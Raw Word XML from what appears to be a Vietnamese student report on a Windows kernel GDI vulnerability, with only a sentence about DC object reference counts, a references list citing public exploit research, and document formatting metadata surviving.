        <w:t xml:space="preserve"> của DC</w:t>
      </w:r>
      <w:r w:rsidR="00A67CF4">
        <w:t xml:space="preserve"> object</w:t>
      </w:r>
      <w:r w:rsidRPr="002E26F9">
        <w:t xml:space="preserve"> có thể được nhận ra bằng cách đánh giá số lượng tham chiếu của DC</w:t>
      </w:r>
      <w:r w:rsidR="00A67CF4">
        <w:t xml:space="preserve"> object</w:t>
      </w:r>
      <w:r w:rsidRPr="002E26F9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1386">
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76DEBA47" wp14:editId="33882BF2">
            <wp:extent cx="6188710" cy="2666365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="214331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187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B96F" w14:textId="77777777" w:rsidR="00A67CF4" w:rsidRDefault="00A67CF4" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB0E2F3" w14:textId="77777777" w:rsidR="00A67CF4" w:rsidRDefault="00A67CF4" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VI) </w:t>
      </w:r>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40787B15" w14:textId="2BAA4F3A" w:rsidR="00A67CF4" w:rsidRDefault="00A67CF4" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00A67CF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/ly4k/CallbackHell/tree/cbeac75baccd66242fa9e3efa5d9d86892f02159</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17E383D7" w14:textId="25176753" w:rsidR="00A67CF4" w:rsidRDefault="00A67CF4" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00A67CF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7269F40A" w14:textId="0BCE7B17" w:rsidR="00A67CF4" w:rsidRPr="00A67CF4" w:rsidRDefault="00A67CF4" w:rsidP="00A67CF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00A67CF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cn-sec.com/archives/1868860.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F21AC25" w14:textId="5BFF4EC1" w:rsidR="00A67CF4" w:rsidRPr="00A67CF4" w:rsidRDefault="00A67CF4" w:rsidP="00A67CF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A67CF4" w:rsidRPr="00A67CF4" w:rsidSect="005978B0">
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="108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CB241" w14:textId="77777777" w:rsidR="0019761E" w:rsidRDefault="0019761E" w:rsidP="0054687B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0E3F7EDB" w14:textId="77777777" w:rsidR="0019761E" w:rsidRDefault="0019761E" w:rsidP="005468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E6090" w14:textId="77777777" w:rsidR="0019761E" w:rsidRDefault="0019761E" w:rsidP="0054687B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="17CF0504" w14:textId="77777777" w:rsidR="0019761E" w:rsidRDefault="0019761E" w:rsidP="005468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F59F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1442DB4"/>
    <w:lvl w:ilvl="0" w:tplc="C10C9A0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93C5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B04A7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F75203D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B6676B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4AE0D60"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FEBE83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36DD9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6FAB30E"/>
    <w:lvl w:ilvl="0" w:tplc="443C3412">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="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A828F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA3E3A72"/>
    <w:lvl w:ilvl="0" w:tplc="E102C5A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2541D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD8E56A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22F2831"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="793C5652"/>
    <w:lvl w:ilvl="0" w:tplc="156E868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A452EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C72A0B28"/>
    <w:lvl w:ilvl="0" w:tplc="D5721AB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192E5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA5CDC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65052A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85B27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254FBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C7A7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B447B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE94B1B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0C1BDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FB66776"/>
    <w:lvl w:ilvl="0" w:tplc="CEEE3C0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DAA2741"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DD6855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52E3089C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2C813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9A1456"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5ACD29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580C01CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48D801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5D5B60"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3EC2FAF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44396B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D683D54"/>
    <w:lvl w:ilvl="0" w:tplc="2D58CD0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="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F27B1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E7EC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0298645">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1589578558">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="574823367">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1141193024">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="159539202">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="336932261">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1028799532">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="312494237">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="317731530">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="938682953">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="811556160">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="543323540">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1697853330">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="895628116">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="24911395">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="761532419">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1391802453">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1571500159">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1993833058">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1758941766">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="13980747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510EF"/>
    <w:rsid w:val="00023B71"/>
    <w:rsid w:val="000379A4"/>
    <w:rsid w:val="00082971"/>
    <w:rsid w:val="000C2DAF"/>
    <w:rsid w:val="000C591C"/>
    <w:rsid w:val="000E4F70"/>
    <w:rsid w:val="000E6CBE"/>
    <w:rsid w:val="00140F66"/>
    <w:rsid w:val="001456B8"/>
    <w:rsid w:val="00192084"/>
    <w:rsid w:val="001974BF"/>
    <w:rsid w:val="0019761E"/>
    <w:rsid w:val="001A5B0D"/>
    <w:rsid w:val="001C525E"/>
    <w:rsid w:val="001F694B"/>
    <w:rsid w:val="00260FE7"/>
    <w:rsid w:val="00265588"/>
    <w:rsid w:val="0027128A"/>
    <w:rsid w:val="002814D0"/>
    <w:rsid w:val="0029425E"/>
    <w:rsid w:val="002969B2"/>
    <w:rsid w:val="002977C8"/>
    <w:rsid w:val="002A5035"/>
    <w:rsid w:val="002E26F9"/>
    <w:rsid w:val="0033420C"/>
    <w:rsid w:val="003407A4"/>
    <w:rsid w:val="003471A0"/>
    <w:rsid w:val="003703F6"/>
    <w:rsid w:val="00394F70"/>
    <w:rsid w:val="003B5C38"/>
    <w:rsid w:val="00410F1D"/>
    <w:rsid w:val="00431892"/>
    <w:rsid w:val="00465BDA"/>
    <w:rsid w:val="00465FB5"/>
    <w:rsid w:val="00471A26"/>
    <w:rsid w:val="0048519D"/>
    <w:rsid w:val="004C40B0"/>
    <w:rsid w:val="004D3742"/>
    <w:rsid w:val="004F2EDA"/>
    <w:rsid w:val="0051447D"/>
    <w:rsid w:val="00514A8A"/>
    <w:rsid w:val="0054687B"/>
    <w:rsid w:val="0054757C"/>
    <w:rsid w:val="005510EF"/>
    <w:rsid w:val="00565574"/>
    <w:rsid w:val="00567292"/>
    <w:rsid w:val="00594AED"/>
    <w:rsid w:val="00595DF1"/>
    <w:rsid w:val="005978B0"/>
    <w:rsid w:val="005B424E"/>
    <w:rsid w:val="005C6073"/>
    <w:rsid w:val="005D21B1"/>
    <w:rsid w:val="005D3F0E"/>
    <w:rsid w:val="005E0F00"/>
    <w:rsid w:val="00606B7A"/>
    <w:rsid w:val="0064779C"/>
    <w:rsid w:val="006644D7"/>
    <w:rsid w:val="00693AB3"/>
    <w:rsid w:val="006C042D"/>
    <w:rsid w:val="006C566C"/>
    <w:rsid w:val="006D6DFF"/>
    <w:rsid w:val="006E2E14"/>
    <w:rsid w:val="006F699A"/>
    <w:rsid w:val="00705D68"/>
    <w:rsid w:val="007132FC"/>
    <w:rsid w:val="007219C3"/>
    <w:rsid w:val="00727A8F"/>
    <w:rsid w:val="00735483"/>
    <w:rsid w:val="00735DA5"/>
    <w:rsid w:val="007A4045"/>
    <w:rsid w:val="008308C7"/>
    <w:rsid w:val="008459A0"/>
    <w:rsid w:val="00851ED5"/>
    <w:rsid w:val="0086188B"/>
    <w:rsid w:val="00874473"/>
    <w:rsid w:val="008C3104"/>
    <w:rsid w:val="0093739C"/>
    <w:rsid w:val="009A2F23"/>
    <w:rsid w:val="009B6535"/>
    <w:rsid w:val="009C0188"/>
    <w:rsid w:val="009C0EC6"/>
    <w:rsid w:val="009D63FB"/>
    <w:rsid w:val="00A23A33"/>
    <w:rsid w:val="00A608FF"/>
    <w:rsid w:val="00A67CF4"/>
    <w:rsid w:val="00A70DDB"/>
    <w:rsid w:val="00AD6B7E"/>
    <w:rsid w:val="00B65E2B"/>
    <w:rsid w:val="00BB03EF"/>
    <w:rsid w:val="00BD4D16"/>
    <w:rsid w:val="00C10BAA"/>
    <w:rsid w:val="00C22AAF"/>
    <w:rsid w:val="00C33E8F"/>
    <w:rsid w:val="00C5479F"/>
    <w:rsid w:val="00CB1386"/>
    <w:rsid w:val="00CB1995"/>
    <w:rsid w:val="00CB241D"/>
    <w:rsid w:val="00CC5EE7"/>
    <w:rsid w:val="00CD605B"/>
    <w:rsid w:val="00D040A0"/>
    <w:rsid w:val="00D412FB"/>
    <w:rsid w:val="00D556A2"/>
    <w:rsid w:val="00D62ABE"/>
    <w:rsid w:val="00D670EB"/>
    <w:rsid w:val="00DA1345"/>
    <w:rsid w:val="00DB77A8"/>
    <w:rsid w:val="00DC05D5"/>
    <w:rsid w:val="00DD1BFE"/>
    <w:rsid w:val="00DD3D23"/>
    <w:rsid w:val="00DD42FC"/>
    <w:rsid w:val="00DD4D77"/>
    <w:rsid w:val="00DE3FCA"/>
    <w:rsid w:val="00E0497B"/>
    <w:rsid w:val="00E1208F"/>
    <w:rsid w:val="00E178B9"/>
    <w:rsid w:val="00E607F2"/>
    <w:rsid w:val="00EC1D99"/>
    <w:rsid w:val="00ED3076"/>
    <w:rsid w:val="00F2673D"/>
    <w:rsid w:val="00F342B1"/>
    <w:rsid w:val="00F36DB4"/>
    <w:rsid w:val="00F54869"/>
    <w:rsid w:val="00F6408C"/>
    <w:rsid w:val="00F72B0C"/>
    <w:rsid w:val="00F77240"/>
    <w:rsid w:val="00F8685C"/>
    <w:rsid w:val="00F961B3"/>
    <w:rsid w:val="00FA4F60"/>
    <w:rsid w:val="00FB6928"/>
    <w:rsid w:val="00FD5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9CD47"/>
  <w15:docId w15:val="{FA46A156-ABEE-4A4B-8DDC-3D7636A37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79C"/>
    <w:pPr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link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005510EF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424E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2971"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi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23A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510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10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510E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B424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0C59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5EE7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style1"/>
    <w:basedOn w:val="Heading2"/>
    <w:link w:val="Style1Char"/>
    <w:qFormat/>
    <w:rsid w:val="008459A0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style2">
    <w:name w:val="Style2"/>
    <w:basedOn w:val="Heading2"/>
    <w:link w:val="Style2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00CD605B"/>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Style1Char">
    <w:name w:val="Style1 Char"/>
    <w:basedOn w:val="Heading2Char"/>
    <w:link w:val="Style1"/>
    <w:rsid w:val="008459A0"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri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82971"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Style2Char">
    <w:name w:val="Style2 Char"/>
    <w:basedOn w:val="Heading2Char"/>
    <w:link w:val="Style2"/>
    <w:rsid w:val="00CD605B"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"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A23A3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B65E2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92084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1F694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F694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46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687B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546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687B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6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1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0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7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4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50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5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2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0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1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1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2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6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0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hyperlink" Target="https://gist.github.com/hugsy/d89c6ee771a4decfdf4f088998d60d19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github.com/ZoloZiak/WinNT4/blob/master/private/ntos/w32/ntgdi/gre/pdevobj.hxx" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ly4k/CallbackHell/tree/cbeac75baccd66242fa9e3efa5d9d86892f02159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openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://census-labs.com/media/windows_10_rs2_rs3_exploitation_primitives.pdf" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cn-sec.com/archives/1868860.html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securelist.com/mysterysnail-attacks-with-windows-zero-day/104509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429AF276866140A082BDCDB6443AF4" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="5a579c9475519750c09cd3e87baa1ca6">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="705c624c-a54e-4702-9161-71d1f04bf7e1" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="f3372df4e823f81c769d5212c2d8146c" ns3:_="">
    <xsd:import namespace="705c624c-a54e-4702-9161-71d1f04bf7e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5c624c-a54e-4702-9161-71d1f04bf7e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58D1DBA-AD37-4DA4-9957-4FF4D882E26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061BC1B-8735-4EB9-ACE7-5BD52F3AE95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FDD6ED5-0881-4300-B1D5-6B94523829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5c624c-a54e-4702-9161-71d1f04bf7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13239</TotalTime>
  <Pages>13</Pages>
  <Words>1128</Words>
  <Characters>6433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TOAN THANG D20AT01</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>NGUYEN TOAN THANG D20AT01</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-16T18:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-15T15:09:00Z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0x01010017429AF276866140A082BDCDB6443AF4</vt:lpwstr>
  </property>
</Properties>
</file>